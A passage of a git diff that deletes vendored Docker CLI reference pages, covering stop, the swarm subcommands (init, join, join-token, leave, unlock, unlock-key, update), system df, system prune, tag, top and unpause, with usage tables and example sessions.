-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# stop
-
-```markdown
-Usage:  docker stop [OPTIONS] CONTAINER [CONTAINER...]
-
-Stop one or more running containers
-
-Options:
-      --help       Print usage
-  -t, --time int   Seconds to wait for stop before killing it (default 10)
-```
-
-The main process inside the container will receive `SIGTERM`, and after a grace
-period, `SIGKILL`.
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md
deleted file mode 100644
index 44afc27476..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_init.md
+++ /dev/null
@@ -1,142 +0,0 @@
----
-title: "swarm init"
-description: "The swarm init command description and usage"
-keywords: "swarm, init"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# swarm init
-
-```markdown
-Usage:  docker swarm init [OPTIONS]
-
-Initialize a swarm
-
-Options:
-      --advertise-addr string           Advertised address (format: <ip|interface>[:port])
-      --autolock                        Enable manager autolocking (requiring an unlock key to start a stopped manager)
-      --cert-expiry duration            Validity period for node certificates (ns|us|ms|s|m|h) (default 2160h0m0s)
-      --dispatcher-heartbeat duration   Dispatcher heartbeat period (ns|us|ms|s|m|h) (default 5s)
-      --external-ca external-ca         Specifications of one or more certificate signing endpoints
-      --force-new-cluster               Force create a new cluster from current state
-      --help                            Print usage
-      --listen-addr node-addr           Listen address (format: <ip|interface>[:port]) (default 0.0.0.0:2377)
-      --max-snapshots uint              Number of additional Raft snapshots to retain
-      --snapshot-interval uint          Number of log entries between Raft snapshots (default 10000)
-      --task-history-limit int          Task history retention limit (default 5)
-```
-
-Initialize a swarm. The docker engine targeted by this command becomes a manager
-in the newly created single-node swarm.
-
-
-```bash
-$ docker swarm init --advertise-addr 192.168.99.121
-Swarm initialized: current node (bvz81updecsj6wjz393c09vti) is now a manager.
-
-To add a worker to this swarm, run the following command:
-
-    docker swarm join \
-    --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx \
-    172.17.0.2:2377
-
-To add a manager to this swarm, run 'docker swarm join-token manager' and follow the instructions.
-```
-
-`docker swarm init` generates two random tokens, a worker token and a manager token. When you join
-a new node to the swarm, the node joins as a worker or manager node based upon the token you pass
-to [swarm join](swarm_join.md).
-
-After you create the swarm, you can display or rotate the token using
-[swarm join-token](swarm_join_token.md).
-
-### `--autolock`
-
-This flag enables automatic locking of managers with an encryption key. The
-private keys and data stored by all managers will be protected by the
-encryption key printed in the output, and will not be accessible without it.
-Thus, it is very important to store this key in order to activate a manager
-after it restarts. The key can be passed to `docker swarm unlock` to reactivate
-the manager. Autolock can be disabled by running
-`docker swarm update --autolock=false`. After disabling it, the encryption key
-is no longer required to start the manager, and it will start up on its own
-without user intervention.
-
-### `--cert-expiry`
-
-This flag sets the validity period for node certificates.
-
-### `--dispatcher-heartbeat`
-
-This flag sets the frequency with which nodes are told to use as a
-period to report their health.
-
-### `--external-ca`
-
-This flag sets up the swarm to use an external CA to issue node certificates. The value takes
-the form `protocol=X,url=Y`. The value for `protocol` specifies what protocol should be used
-to send signing requests to the external CA. Currently, the only supported value is `cfssl`.
-The URL specifies the endpoint where signing requests should be submitted.
-
-### `--force-new-cluster`
-
-This flag forces an existing node that was part of a quorum that was lost to restart as a single node Manager without losing its data.
-
-### `--listen-addr`
-
-The node listens for inbound swarm manager traffic on this address. The default is to listen on
-0.0.0.0:2377. It is also possible to specify a network interface to listen on that interface's
-address; for example `--listen-addr eth0:2377`.
-
-Specifying a port is optional. If the value is a bare IP address or interface
-name, the default port 2377 will be used.
-
-### `--advertise-addr`
-
-This flag specifies the address that will be advertised to other members of the
-swarm for API access and overlay networking. If unspecified, Docker will check
-if the system has a single IP address, and use that IP address with the
-listening port (see `--listen-addr`). If the system has multiple IP addresses,
-`--advertise-addr` must be specified so that the correct address is chosen for
-inter-manager communication and overlay networking.
-
-It is also possible to specify a network interface to advertise that interface's address;
-for example `--advertise-addr eth0:2377`.
-
-Specifying a port is optional. If the value is a bare IP address or interface
-name, the default port 2377 will be used.
-
-### `--task-history-limit`
-
-This flag sets up task history retention limit.
-
-### `--max-snapshots`
-
-This flag sets the number of old Raft snapshots to retain in addition to the
-current Raft snapshots. By default, no old snapshots are retained. This option
-may be used for debugging, or to store old snapshots of the swarm state for
-disaster recovery purposes.
-
-### `--snapshot-interval`
-
-This flag specifies how many log entries to allow in between Raft snapshots.
-Setting this to a higher number will trigger snapshots less frequently.
-Snapshots compact the Raft log and allow for more efficient transfer of the
-state to new managers. However, there is a performance cost to taking snapshots
-frequently.
-
-## Related information
-
-* [swarm join](swarm_join.md)
-* [swarm leave](swarm_leave.md)
-* [swarm update](swarm_update.md)
-* [swarm join-token](swarm_join_token.md)
-* [node rm](node_rm.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md
deleted file mode 100644
index 0cde0d7bcd..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join.md
+++ /dev/null
@@ -1,102 +0,0 @@
----
-title: "swarm join"
-description: "The swarm join command description and usage"
-keywords: "swarm, join"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# swarm join
-
-```markdown
-Usage:  docker swarm join [OPTIONS] HOST:PORT
-
-Join a swarm as a node and/or manager
-
-Options:
-      --advertise-addr string   Advertised address (format: <ip|interface>[:port])
-      --help                    Print usage
-      --listen-addr node-addr   Listen address (format: <ip|interface>[:port]) (default 0.0.0.0:2377)
-      --token string            Token for entry into the swarm
-```
-
-Join a node to a swarm. The node joins as a manager node or worker node based upon the token you
-pass with the `--token` flag. If you pass a manager token, the node joins as a manager. If you
-pass a worker token, the node joins as a worker.
-
-### Join a node to swarm as a manager
-
-The example below demonstrates joining a manager node using a manager token.
-
-```bash
-$ docker swarm join --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2 192.168.99.121:2377
-This node joined a swarm as a manager.
-$ docker node ls
-ID                           HOSTNAME  STATUS  AVAILABILITY  MANAGER STATUS
-dkp8vy1dq1kxleu9g4u78tlag *  manager2  Ready   Active        Reachable
-dvfxp4zseq4s0rih1selh0d20    manager1  Ready   Active        Leader
-```
-
-A cluster should only have 3-7 managers at most, because a majority of managers must be available
-for the cluster to function. Nodes that aren't meant to participate in this management quorum
-should join as workers instead. Managers should be stable hosts that have static IP addresses.
-
-### Join a node to swarm as a worker
-
-The example below demonstrates joining a worker node using a worker token.
-
-```bash
-$ docker swarm join --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx 192.168.99.121:2377
-This node joined a swarm as a worker.
-$ docker node ls
-ID                           HOSTNAME  STATUS  AVAILABILITY  MANAGER STATUS
-7ln70fl22uw2dvjn2ft53m3q5    worker2   Ready   Active
-dkp8vy1dq1kxleu9g4u78tlag    worker1   Ready   Active        Reachable
-dvfxp4zseq4s0rih1selh0d20 *  manager1  Ready   Active        Leader
-```
-
-### `--listen-addr value`
-
-If the node is a manager, it will listen for inbound swarm manager traffic on this
-address. The default is to listen on 0.0.0.0:2377. It is also possible to specify a
-network interface to listen on that interface's address; for example `--listen-addr eth0:2377`.
-
-Specifying a port is optional. If the value is a bare IP address, or interface
-name, the default port 2377 will be used.
-
-This flag is generally not necessary when joining an existing swarm.
-
-### `--advertise-addr value`
-
-This flag specifies the address that will be advertised to other members of the
-swarm for API access. If unspecified, Docker will check if the system has a
-single IP address, and use that IP address with the listening port (see
-`--listen-addr`). If the system has multiple IP addresses, `--advertise-addr`
-must be specified so that the correct address is chosen for inter-manager
-communication and overlay networking.
-
-It is also possible to specify a network interface to advertise that interface's address;
-for example `--advertise-addr eth0:2377`.
-
-Specifying a port is optional. If the value is a bare IP address, or interface
-name, the default port 2377 will be used.
-
-This flag is generally not necessary when joining an existing swarm.
-
-### `--token string`
-
-Secret value required for nodes to join the swarm
-
-
-## Related information
-
-* [swarm init](swarm_init.md)
-* [swarm leave](swarm_leave.md)
-* [swarm update](swarm_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md
deleted file mode 100644
index d731f028ba..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_join_token.md
+++ /dev/null
@@ -1,105 +0,0 @@
----
-title: "swarm join-token"
-description: "The swarm join-token command description and usage"
-keywords: "swarm, join-token"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# swarm join-token
-
-```markdown
-Usage:	docker swarm join-token [OPTIONS] (worker|manager)
-
-Manage join tokens
-
-Options:
-      --help     Print usage
-  -q, --quiet    Only display token
-      --rotate   Rotate join token
-```
-
-Join tokens are secrets that allow a node to join the swarm. There are two
-different join tokens available, one for the worker role and one for the manager
-role. You pass the token using the `--token` flag when you run
-[swarm join](swarm_join.md). Nodes use the join token only when they join the
-swarm.
-
-You can view or rotate the join tokens using `swarm join-token`.
-
-As a convenience, you can pass `worker` or `manager` as an argument to
-`join-token` to print the full `docker swarm join` command to join a new node to
-the swarm:
-
-```bash
-$ docker swarm join-token worker
-To add a worker to this swarm, run the following command:
-
-    docker swarm join \
-    --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-1awxwuwd3z9j1z3puu7rcgdbx \
-    172.17.0.2:2377
-
-$ docker swarm join-token manager
-To add a manager to this swarm, run the following command:
-
-    docker swarm join \
-    --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-7p73s1dx5in4tatdymyhg9hu2 \
-    172.17.0.2:2377
-```
-
-Use the `--rotate` flag to generate a new join token for the specified role:
-
-```bash
-$ docker swarm join-token --rotate worker
-Successfully rotated worker join token.
-
-To add a worker to this swarm, run the following command:
-
-    docker swarm join \
-    --token SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-b30ljddcqhef9b9v4rs7mel7t \
-    172.17.0.2:2377
-```
-
-After using `--rotate`, only the new token will be valid for joining with the specified role.
-
-The `-q` (or `--quiet`) flag only prints the token:
-
-```bash
-$ docker swarm join-token -q worker
-
-SWMTKN-1-3pu6hszjas19xyp7ghgosyx9k8atbfcr8p2is99znpy26u2lkl-b30ljddcqhef9b9v4rs7mel7t
-```
-
-### `--rotate`
-
-Because tokens allow new nodes to join the swarm, you should keep them secret.
-Be particularly careful with manager tokens since they allow new manager nodes
-to join the swarm. A rogue manager has the potential to disrupt the operation of
-your swarm.
-
-Rotate your swarm's join token if a token gets checked-in to version control,
-stolen, or a node is compromised. You may also want to periodically rotate the
-token to ensure any unknown token leaks do not allow a rogue node to join
-the swarm.
-
-To rotate the join token and print the newly generated token, run
-`docker swarm join-token --rotate` and pass the role: `manager` or `worker`.
-
-Rotating a join-token means that no new nodes will be able to join the swarm
-using the old token. Rotation does not affect existing nodes in the swarm
-because the join token is only used for authorizing new nodes joining the swarm.
-
-### `--quiet`
-
-Only print the token. Do not print a complete command for joining.
-
-## Related information
-
-* [swarm join](swarm_join.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md
deleted file mode 100644
index c0d9437818..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_leave.md
+++ /dev/null
@@ -1,58 +0,0 @@
----
-title: "swarm leave"
-description: "The swarm leave command description and usage"
-keywords: "swarm, leave"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# swarm leave
-
-```markdown
-Usage:	docker swarm leave [OPTIONS]
-
-Leave the swarm
-
-Options:
-  -f, --force   Force this node to leave the swarm, ignoring warnings
-      --help    Print usage
-```
-
-When you run this command on a worker, that worker leaves the swarm.
-
-You can use the `--force` option to on a manager to remove it from the swarm.
-However, this does not reconfigure the swarm to ensure that there are enough
-managers to maintain a quorum in the swarm. The safe way to remove a manager
-from a swarm is to demote it to a worker and then direct it to leave the quorum
-without using `--force`. Only use `--force` in situations where the swarm will
-no longer be used after the manager leaves, such as in a single-node swarm.
-
-Consider the following swarm, as seen from the manager:
-```bash
-$ docker node ls
-ID                           HOSTNAME  STATUS  AVAILABILITY  MANAGER STATUS
-7ln70fl22uw2dvjn2ft53m3q5    worker2   Ready   Active
-dkp8vy1dq1kxleu9g4u78tlag    worker1   Ready   Active
-dvfxp4zseq4s0rih1selh0d20 *  manager1  Ready   Active        Leader
-```
-
-To remove `worker2`, issue the following command from `worker2` itself:
-```bash
-$ docker swarm leave
-Node left the default swarm.
-```
-To remove an inactive node, use the [`node rm`](node_rm.md) command instead.
-
-## Related information
-
-* [node rm](node_rm.md)
-* [swarm init](swarm_init.md)
-* [swarm join](swarm_join.md)
-* [swarm update](swarm_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md
deleted file mode 100644
index 164b7d35a4..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock.md
+++ /dev/null
@@ -1,41 +0,0 @@
----
-title: "swarm unlock"
-description: "The swarm unlock command description and usage"
-keywords: "swarm, unlock"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# swarm unlock
-
-```markdown
-Usage:	docker swarm unlock
-
-Unlock swarm
-
-Options:
-      --help   Print usage
-```
-
-Unlocks a locked manager using a user-supplied unlock key. This command must be
-used to reactivate a manager after its Docker daemon restarts if the autolock
-setting is turned on. The unlock key is printed at the time when autolock is
-enabled, and is also available from the `docker swarm unlock-key` command.
-
-
-```bash
-$ docker swarm unlock
-Please enter unlock key:
-```
-
-## Related information
-
-* [swarm init](swarm_init.md)
-* [swarm update](swarm_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md
deleted file mode 100644
index a2597fe9ab..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_unlock_key.md
+++ /dev/null
@@ -1,84 +0,0 @@
----
-title: "swarm unlock-key"
-description: "The swarm unlock-keycommand description and usage"
-keywords: "swarm, unlock-key"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# swarm unlock-key
-
-```markdown
-Usage:	docker swarm unlock-key [OPTIONS]
-
-Manage the unlock key
-
-Options:
-      --help     Print usage
-  -q, --quiet    Only display token
-      --rotate   Rotate unlock key
-```
-
-An unlock key is a secret key needed to unlock a manager after its Docker daemon
-restarts. These keys are only used when the autolock feature is enabled for the
-swarm.
-
-You can view or rotate the unlock key using `swarm unlock-key`. To view the key,
-run the `docker swarm unlock-key` command without any arguments:
-
-
-```bash
-$ docker swarm unlock-key
-To unlock a swarm manager after it restarts, run the `docker swarm unlock`
-command and provide the following key:
-
-    SWMKEY-1-fySn8TY4w5lKcWcJPIpKufejh9hxx5KYwx6XZigx3Q4
-
-Please remember to store this key in a password manager, since without it you
-will not be able to restart the manager.
-```
-
-Use the `--rotate` flag to rotate the unlock key to a new, randomly-generated
-key:
-
-```bash
-$ docker swarm unlock-key --rotate
-Successfully rotated manager unlock key.
-
-To unlock a swarm manager after it restarts, run the `docker swarm unlock`
-command and provide the following key:
-
-    SWMKEY-1-7c37Cc8654o6p38HnroywCi19pllOnGtbdZEgtKxZu8
-
-Please remember to store this key in a password manager, since without it you
-will not be able to restart the manager.
-```
-
-The `-q` (or `--quiet`) flag only prints the key:
-
-```bash
-$ docker swarm unlock-key -q
-SWMKEY-1-7c37Cc8654o6p38HnroywCi19pllOnGtbdZEgtKxZu8
-```
-
-### `--rotate`
-
-This flag rotates the unlock key, replacing it with a new randomly-generated
-key. The old unlock key will no longer be accepted.
-
-### `--quiet`
-
-Only print the unlock key, without instructions.
-
-## Related information
-
-* [swarm unlock](swarm_unlock.md)
-* [swarm init](swarm_init.md)
-* [swarm update](swarm_update.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md b/vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md
deleted file mode 100644
index 0af63fe3e0..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/swarm_update.md
+++ /dev/null
@@ -1,45 +0,0 @@
----
-title: "swarm update"
-description: "The swarm update command description and usage"
-keywords: "swarm, update"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# swarm update
-
-```markdown
-Usage:  docker swarm update [OPTIONS]
-
-Update the swarm
-
-Options:
-      --autolock                        Change manager autolocking setting (true|false)
-      --cert-expiry duration            Validity period for node certificates (ns|us|ms|s|m|h) (default 2160h0m0s)
-      --dispatcher-heartbeat duration   Dispatcher heartbeat period (ns|us|ms|s|m|h) (default 5s)
-      --external-ca external-ca         Specifications of one or more certificate signing endpoints
-      --help                            Print usage
-      --max-snapshots uint              Number of additional Raft snapshots to retain
-      --snapshot-interval uint          Number of log entries between Raft snapshots (default 10000)
-      --task-history-limit int          Task history retention limit (default 5)
-```
-
-Updates a swarm with new parameter values. This command must target a manager node.
-
-
-```bash
-$ docker swarm update --cert-expiry 720h
-```
-
-## Related information
-
-* [swarm init](swarm_init.md)
-* [swarm join](swarm_join.md)
-* [swarm leave](swarm_leave.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/system_df.md b/vendor/github.com/docker/docker/docs/reference/commandline/system_df.md
deleted file mode 100644
index c6e8bbdc68..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/system_df.md
+++ /dev/null
@@ -1,76 +0,0 @@
----
-title: "system df"
-description: "The system df command description and usage"
-keywords: "system, data, usage, disk"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# system df
-
-```markdown
-Usage:	docker system df [OPTIONS]
-
-Show docker filesystem usage
-
-Options:
-      --help      Print usage
-  -v, --verbose   Show detailed information on space usage
-```
-
-The `docker system df` command displays information regarding the
-amount of disk space used by the docker daemon.
-
-By default the command will just show a summary of the data used:
-```bash
-$ docker system df
-TYPE                TOTAL               ACTIVE              SIZE                RECLAIMABLE
-Images              5                   2                   16.43 MB            11.63 MB (70%)
-Containers          2                   0                   212 B               212 B (100%)
-Local Volumes       2                   1                   36 B                0 B (0%)
-```
-
-A more detailed view can be requested using the `-v, --verbose` flag:
-```bash
-$ docker system df -v
-Images space usage:
-
-REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE                SHARED SIZE         UNIQUE SIZE         CONTAINERS
-my-curl             latest              b2789dd875bf        6 minutes ago       11 MB               11 MB               5 B                 0
-my-jq               latest              ae67841be6d0        6 minutes ago       9.623 MB            8.991 MB            632.1 kB            0
-<none>              <none>              a0971c4015c1        6 minutes ago       11 MB               11 MB               0 B                 0
-alpine              latest              4e38e38c8ce0        9 weeks ago         4.799 MB            0 B                 4.799 MB            1
-alpine              3.3                 47cf20d8c26c        9 weeks ago         4.797 MB            4.797 MB            0 B                 1
-
-Containers space usage:
-
-CONTAINER ID        IMAGE               COMMAND             LOCAL VOLUMES       SIZE                CREATED             STATUS                      NAMES
-4a7f7eebae0f        alpine:latest       "sh"                1                   0 B                 16 minutes ago      Exited (0) 5 minutes ago    hopeful_yalow
-f98f9c2aa1ea        alpine:3.3          "sh"                1                   212 B               16 minutes ago      Exited (0) 48 seconds ago   anon-vol
-
-Local Volumes space usage:
-
-NAME                                                               LINKS               SIZE
-07c7bdf3e34ab76d921894c2b834f073721fccfbbcba792aa7648e3a7a664c2e   2                   36 B
-my-named-vol                                                       0                   0 B
-```
-
-* `SHARED SIZE` is the amount of space that an image shares with another one (i.e. their common data)
-* `UNIQUE SIZE` is the amount of space that is only used by a given image
-* `SIZE` is the virtual size of the image, it is the sum of `SHARED SIZE` and `UNIQUE SIZE`
-
-Note that network information is not shown because it doesn't consume the disk space.
-
-## Related Information
-* [system prune](system_prune.md)
-* [container prune](container_prune.md)
-* [volume prune](volume_prune.md)
-* [image prune](image_prune.md)
-* [network prune](network_prune.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md b/vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md
deleted file mode 100644
index 46f8c4364a..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/system_prune.md
+++ /dev/null
@@ -1,79 +0,0 @@
----
-title: "system prune"
-description: "Remove unused data"
-keywords: "system, prune, delete, remove"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# system prune
-
-```markdown
-Usage:	docker system prune [OPTIONS]
-
-Delete unused data
-
-Options:
-  -a, --all     Remove all unused data not just dangling ones
-  -f, --force   Do not prompt for confirmation
-      --help    Print usage
-```
-
-Remove all unused containers, volumes, networks and images (both dangling and unreferenced).
-
-Example output:
-
-```bash
-$ docker system prune -a
-WARNING! This will remove:
-	- all stopped containers
-	- all volumes not used by at least one container
-	- all networks not used by at least one container
-	- all images without at least one container associated to them
-Are you sure you want to continue? [y/N] y
-Deleted Containers:
-0998aa37185a1a7036b0e12cf1ac1b6442dcfa30a5c9650a42ed5010046f195b
-73958bfb884fa81fa4cc6baf61055667e940ea2357b4036acbbe25a60f442a4d
-
-Deleted Volumes:
-named-vol
-
-Deleted Images:
-untagged: my-curl:latest
-deleted: sha256:7d88582121f2a29031d92017754d62a0d1a215c97e8f0106c586546e7404447d
-deleted: sha256:dd14a93d83593d4024152f85d7c63f76aaa4e73e228377ba1d130ef5149f4d8b
-untagged: alpine:3.3
-deleted: sha256:695f3d04125db3266d4ab7bbb3c6b23aa4293923e762aa2562c54f49a28f009f
-untagged: alpine:latest
-deleted: sha256:ee4603260daafe1a8c2f3b78fd760922918ab2441cbb2853ed5c439e59c52f96
-deleted: sha256:9007f5987db353ec398a223bc5a135c5a9601798ba20a1abba537ea2f8ac765f
-deleted: sha256:71fa90c8f04769c9721459d5aa0936db640b92c8c91c9b589b54abd412d120ab
-deleted: sha256:bb1c3357b3c30ece26e6604aea7d2ec0ace4166ff34c3616701279c22444c0f3
-untagged: my-jq:latest
-deleted: sha256:6e66d724542af9bc4c4abf4a909791d7260b6d0110d8e220708b09e4ee1322e1
-deleted: sha256:07b3fa89d4b17009eb3988dfc592c7d30ab3ba52d2007832dffcf6d40e3eda7f
-deleted: sha256:3a88a5c81eb5c283e72db2dbc6d65cbfd8e80b6c89bb6e714cfaaa0eed99c548
-
-Total reclaimed space: 13.5 MB
-```
-
-## Related information
-
-* [volume create](volume_create.md)
-* [volume ls](volume_ls.md)
-* [volume inspect](volume_inspect.md)
-* [volume rm](volume_rm.md)
-* [volume prune](volume_prune.md)
-* [Understand Data Volumes](https://docs.docker.com/engine/tutorials/dockervolumes/)
-* [system df](system_df.md)
-* [container prune](container_prune.md)
-* [image prune](image_prune.md)
-* [network prune](network_prune.md)
-* [system prune](system_prune.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/tag.md b/vendor/github.com/docker/docker/docs/reference/commandline/tag.md
deleted file mode 100644
index 983bfe27b2..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/tag.md
+++ /dev/null
@@ -1,74 +0,0 @@
----
-title: "tag"
-description: "The tag command description and usage"
-keywords: "tag, name, image"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# tag
-
-```markdown
-Usage:  docker tag SOURCE_IMAGE[:TAG] TARGET_IMAGE[:TAG]
-
-Create a tag TARGET_IMAGE that refers to SOURCE_IMAGE
-
-Options:
-      --help   Print usage
-```
-
-An image name is made up of slash-separated name components, optionally prefixed
-by a registry hostname. The hostname must comply with standard DNS rules, but
-may not contain underscores. If a hostname is present, it may optionally be
-followed by a port number in the format `:8080`. If not present, the command
-uses Docker's public registry located at `registry-1.docker.io` by default. Name
-components may contain lowercase characters, digits and separators. A separator
-is defined as a period, one or two underscores, or one or more dashes. A name
-component may not start or end with a separator.
-
-A tag name may contain lowercase and uppercase characters, digits, underscores,
-periods and dashes. A tag name may not start with a period or a dash and may
-contain a maximum of 128 characters.
-
-You can group your images together using names and tags, and then upload them
-to [*Share Images via Repositories*](https://docs.docker.com/engine/tutorials/dockerrepos/#/contributing-to-docker-hub).
-
-# Examples
-
-## Tagging an image referenced by ID
-
-To tag a local image with ID "0e5574283393" into the "fedora" repository with
-"version1.0":
-
-    docker tag 0e5574283393 fedora/httpd:version1.0
-
-## Tagging an image referenced by Name
-
-To tag a local image with name "httpd" into the "fedora" repository with
-"version1.0":
-
-    docker tag httpd fedora/httpd:version1.0
-
-Note that since the tag name is not specified, the alias is created for an
-existing local version `httpd:latest`.
-
-## Tagging an image referenced by Name and Tag
-
-To tag a local image with name "httpd" and tag "test" into the "fedora"
-repository with "version1.0.test":
-
-    docker tag httpd:test fedora/httpd:version1.0.test
-
-## Tagging an image for a private repository
-
-To push an image to a private registry and not the central Docker
-registry you must tag it with the registry hostname and port (if needed).
-
-    docker tag 0e5574283393 myregistryhost:5000/fedora/httpd:version1.0
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/top.md b/vendor/github.com/docker/docker/docs/reference/commandline/top.md
deleted file mode 100644
index 0a04828775..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/top.md
+++ /dev/null
@@ -1,25 +0,0 @@
----
-title: "top"
-description: "The top command description and usage"
-keywords: "container, running, processes"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# top
-
-```markdown
-Usage:  docker top CONTAINER [ps OPTIONS]
-
-Display the running processes of a container
-
-Options:
-      --help   Print usage
-```
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/unpause.md b/vendor/github.com/docker/docker/docs/reference/commandline/unpause.md
deleted file mode 100644
index aa2326fefc..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/unpause.md
+++ /dev/null
@@ -1,36 +0,0 @@
----
-title: "unpause"
-description: "The unpause command description and usage"
-keywords: "cgroups, suspend, container"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
-     requests which include edits to this file in other repositories
-     will be rejected.
--->
-
-# unpause
-
-```markdown
-Usage:  docker unpause CONTAINER [CONTAINER...]
-
-Unpause all processes within one or more containers
-
-Options:
-      --help   Print usage
-```
-
-The `docker unpause` command un-suspends all processes in the specified containers.
-On Linux, it does this using the cgroups freezer.
-
-See the
-[cgroups freezer documentation](https://www.kernel.org/doc/Documentation/cgroup-v1/freezer-subsystem.txt)
-for further details.
-
-## Related information
-
-* [pause](pause.md)
diff --git a/vendor/github.com/docker/docker/docs/reference/commandline/update.md b/vendor/github.com/docker/docker/docs/reference/commandline/update.md
deleted file mode 100644
index a13900440f..0000000000
--- a/vendor/github.com/docker/docker/docs/reference/commandline/update.md
+++ /dev/null
@@ -1,120 +0,0 @@
----
-title: "update"
-description: "The update command description and usage"
-keywords: "resources, update, dynamically"
----
-
-<!-- This file is maintained within the docker/docker Github
-     repository at https://github.com/docker/docker/. Make all
-     pull requests against that repo. If you see this file in
-     another repository, consider it read-only there, as it will
-     periodically be overwritten by the definitive file. Pull
